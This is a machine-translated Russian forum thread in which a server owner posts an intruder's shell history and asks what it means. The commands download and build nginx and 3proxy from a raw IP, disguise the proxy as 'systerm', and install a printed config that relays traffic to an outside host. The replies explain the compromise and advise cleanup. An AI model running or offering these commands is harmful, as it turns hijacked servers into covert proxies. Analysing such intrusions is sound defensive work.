Объяснение команды
Кто-то взломал мой частный сервер, и я нашел ниже форму команды история командной строки. Какое-либо тело может объяснить, что, это означает?
1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx
и
2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &
3 ответа
Кто-то, по-видимому, загрузил и установил nginx (веб-сервер) и 3proxy (прокси-сервер).
Таким образом, я предполагаю, что Ваш сервер используется теперь в качестве промежуточного прокси хакерами. Удаление и удаление тех серверов были бы лучшим планом действий меня вещи. (в дополнение к закручиванию Вашей безопасности, конечно, ;-)
Это пытается установить веб-сервер и прокси со следующими настройками:
user www-data;
worker_processes 2;
error_log logs/error.log notice;
worker_rlimit_nofile 10240;
events { worker_connections 8192; use epoll; }
http {
include mime.types;
access_log off;
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 0;
server_tokens off;
server_names_hash_bucket_size 64;
#//G
deny 64.233.160.0/19;
deny 66.102.0.0/20;
deny 66.249.64.0/19;
deny 72.14.192.0/18;
deny 74.125.0.0/16;
deny 89.207.224.0/24;
deny 193.142.125.0/24;
deny 194.110.194.0/24;
deny 209.85.128.0/17;
deny 216.239.32.0/19;
server {
listen 8080;
location ~* ^.+\.(gif|png|jpg)$ {
root /var/tmp/$host;
error_page 404 = @fetch;
}
location @fetch {
internal;
proxy_pass http://serverparkhosting.com:4480;
proxy_redirect off;
proxy_ignore_client_abort on;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_buffers 400 50k;
proxy_read_timeout 300;
proxy_send_timeout 300;
proxy_store /var/tmp/$host/$uri;
proxy_store_access user:rw group:rw all:r;
root /var/tmp/$host;
}
location / {
proxy_pass http://serverparkhosting.com:4480;
proxy_redirect off;
proxy_ignore_client_abort on;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_buffers 100 50k;
proxy_read_timeout 300;
proxy_send_timeout 300;
}
location = /info { stub_status on; }
}
}
Как другие сказали, Ваш сервер был поставлен под угрозу кем-то еще. После того как Вы восстановили любого путем удаления и/или переустановки, необходимо серьезно рассмотреть реализацию очень базовой безопасности. Хорошее место для запуска является руководствами безопасности дистрибутива Linux и возможно чего-то как сценарии тигра.